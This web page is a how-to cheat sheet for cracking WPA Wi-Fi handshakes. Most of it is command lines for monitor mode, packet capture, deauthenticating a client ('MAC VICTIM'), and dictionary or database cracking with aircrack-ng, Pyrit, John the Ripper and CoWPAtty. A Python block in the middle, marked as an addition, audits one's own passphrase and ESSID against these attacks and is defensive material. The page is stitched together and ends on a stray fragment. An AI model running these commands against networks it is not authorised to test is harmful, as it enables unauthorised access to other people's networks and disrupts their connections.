
How to Crack WPA Handshake with Different Tools

Cracking a WPA handshake nowadays can be easy or can take an eternity. Here I will explain the tools and techniques used by professionals.

Capture WPA Handshake

airmon-ng start <INTERFACE> <CHANNEL>
airodump-ng -c <CHANNEL> --bssid <BSSID> -w <FILENAME> wlan0mon
aireplay-ng -0 1 -a <BSSID> -c <MAC VICTIM> wlan0mon

Crack WPA Handshake Methods

Dictionary mode

Cracking WPA handshakes with a wordlist is the most common procedure.

aircrack-ng -w <WORDLIST> <.CAP FILENAME>

Database mode

aircrack-ng -r <DB NAME> <.CAP FILENAME>

Cracking WPA with Pyrit

airmon-ng start <INTERFACE> <CHANNEL>
pyrit -r <INTERFACE> -o <FILENAME> stripLive
aireplay-ng -0 1 -a <BSSID> -c <MAC VICTIM> wlan0mon

Dictionary mode

pyrit -r <.CAP FILENAME> -i <WORDLIST> -b <BSSID> attack_passthrough

Database mode

pyrit -i <WORDLIST> import_passwords
pyrit -e <ESSID> create_essid
pyrit batch
pyrit -r <.CAP FILENAME> -b <BSSID> attack_db
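
Why the dictionary and database modes above are fast against some networks and hopeless against others, shown as an added Python example (not from the original page or from any of the tools): WPA/WPA2-PSK derives the pairwise master key (PMK) with PBKDF2-HMAC-SHA1 salted by the ESSID, so a precomputed database only applies to the ESSID it was built for, and a passphrase outside the wordlist leaves only exhaustive search. The function names, sample wordlist, ESSID list and guess rate are constructed assumptions for auditing your own network's settings.

```python
import hashlib
import string

PBKDF2_ITERATIONS = 4096  # fixed by WPA/WPA2-PSK (IEEE 802.11i)
SECONDS_PER_YEAR = 365 * 24 * 3600

def derive_pmk(passphrase: str, essid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, salt=ESSID, 4096 rounds, 32 bytes)."""
    if not 8 <= len(passphrase) <= 63:
        raise ValueError("WPA passphrase must be 8 to 63 characters")
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("ascii"),
                               essid.encode("utf-8"), PBKDF2_ITERATIONS, 32)

def charset_size(passphrase: str) -> int:
    """Size of the smallest standard character pool covering the passphrase."""
    pools = (string.ascii_lowercase, string.ascii_uppercase,
             string.digits, string.punctuation + " ")
    return sum(len(p) for p in pools if any(c in p for c in passphrase))

def audit_psk(passphrase, essid, wordlist, common_essids, guesses_per_sec):
    """Rate a network's own PSK against the dictionary and database modes."""
    keyspace = charset_size(passphrase) ** len(passphrase)
    return {
        # Dictionary mode succeeds only if the passphrase is in the wordlist.
        "in_wordlist": passphrase in wordlist,
        # Database mode reuses PMKs precomputed for one ESSID; a unique ESSID
        # forces the full PBKDF2 cost for every guess.
        "essid_precomputable": essid in common_essids,
        # Average exhaustive-search time at the assumed guess rate.
        "brute_force_years": keyspace / 2 / guesses_per_sec / SECONDS_PER_YEAR,
    }

# Constructed sample data (assumptions, not from the page).
SAMPLE_WORDLIST = {"password", "12345678", "qwertyuiop"}
SAMPLE_COMMON_ESSIDS = {"linksys", "default", "NETGEAR"}
ASSUMED_RATE = 100_000  # guesses per second, hypothetical attacker hardware

if __name__ == "__main__":
    # Same passphrase, different ESSID: the PMKs differ, so a table built for
    # one ESSID is useless against the other.
    print(derive_pmk("password", "linksys").hex())
    print(derive_pmk("password", "home-7f3a").hex())
    for pw, essid in [("12345678", "linksys"), ("t7#Kq9!vLz2@Wm4x", "home-7f3a")]:
        print(essid, audit_psk(pw, essid, SAMPLE_WORDLIST,
                               SAMPLE_COMMON_ESSIDS, ASSUMED_RATE))
```

A long random passphrase combined with a non-default ESSID removes both shortcuts: no wordlist hit and no reusable precomputed PMKs.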

Cracking WPA with John the Ripper (JTR)

./john --wordlist=<WORDLIST> --rules --stdout | aircrack-ng -e <ESSID> -w - <.CAP FILENAME>

Cracking WPA with CoWPAtty

cowpatty -r <.CAP FILENAME> -f <WORDLIST> -s <ESSID>

John Cracker
